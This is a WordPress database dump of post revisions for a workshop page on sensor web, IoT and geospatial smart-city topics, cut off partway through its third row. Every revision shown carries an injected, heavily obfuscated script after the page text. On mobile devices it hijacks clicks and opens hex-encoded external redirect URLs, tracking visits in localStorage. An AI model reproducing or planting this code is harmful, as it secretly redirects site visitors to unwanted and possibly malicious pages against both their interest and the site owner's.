(3411,1,'2022-12-06 05:12:39','2022-12-06 05:12:39','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"6x8\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:12:39','2022-12-06 05:12:39','',3386,'https://gsw2023.com/?p=3411',0,'revision','',0),
(3412,1,'2022-12-06 05:13:17','2022-12-06 05:13:17','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:13:17','2022-12-06 05:13:17','',3386,'https://gsw2023.com/?p=3412',0,'revision','',0),
(3413,1,'2022-12-06 05:13:53','2022-12-06 05:13:53','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\